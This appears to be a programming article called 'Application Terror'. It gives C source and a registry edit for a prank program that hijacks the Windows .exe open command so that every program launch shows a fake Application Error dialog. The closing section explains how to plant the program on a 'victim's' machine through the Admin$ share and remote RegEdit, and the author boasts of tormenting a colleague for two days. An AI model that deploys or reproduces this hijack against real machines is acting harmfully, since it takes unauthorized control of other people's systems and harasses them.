Application Terror

• Download source files - 4.28 Kb

Being Bad

If you ever wanted to annoy someone really, here is a way to do it. Windows stores for .exe files a registry key which specifies what to do with a ".exe" file. It is located at HKEY_CLASSES_ROOT\exefile\shell\open\command and normally contains the value "%1" %* which just means: do what the first parameter specifies and pass the rest of the parameters as new parameters. As you may know, the first parameter is the full name of the .exe file to be executed.

And here we start with our nasty trick. We redirect the command line to our "application". We do this by modifying the registry key:

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"aelaunch.exe\" %1 %*"

You see already that our application is named AELAUNCH.EXE (you can give it any name) and takes some parameters.

The Bad One

Well, from now on, any application seems to generate an application error but still continues to run somehow.

The application is no miracle, it doesn't need nor use MFC. The whole code is just about 50 lines including comments. The main function is:

int APIENTRY _tWinMain(HINSTANCE hInst, 
   HINSTANCE,LPTSTR lpCmdLine, int nCmdShow)
{
    if (lpCmdLine[0] != '\0') // we have a command line?
    {
        LPSTR p = lpCmdLine;
        while(*p)
        {
            if(*p == '\"') // lets get rid of any quotes
                *p = ' ';
            p++;
        }
        // ::MessageBox(NULL, lpCmdLine, "Commandline", MB_OK);
        WinExec(lpCmdLine, nCmdShow);
    }

    DialogBox(hInst, (LPCTSTR)IDD_APPLICATIONTERROR_DIALOG, 
                                   NULL, (DLGPROC)DialogProc);
    
    return 0;
}

It uses the "obsolete" function WinExec() just because it's convenient and works perfectly. Using CreateProcess() or ShellExecute() would cause far too much trouble.

As you see, the application checks for a command line, replaces any existing quote characters with spaces (we really don't need them here anymore) and passes the command line to WinExec.

When WinExec returns (as soon as the starting application calls the first time, GetMessage()), the application shows a dialog which happen to look like the well known Application Error dialog. :-)

Relax and Enjoy

Now you may wonder how this will annoy anyone? Remember a default share called Admin$? And do you remember that RegEdit can connect to other machines? Bingo, just copy the executable to your victim's Admin$\system32 directory, run RegEdit and modify the registry of the victim's machine. Here you go...

Try it and smile, while making a mental list of who will be the next target for aelaunch.exe.

The last one whom I targeted with it suffered 2 days until he found what I did. It was a well done payback.

This article, along with any associated source code and files, is licensed under The Microsoft Public License (Ms-PL)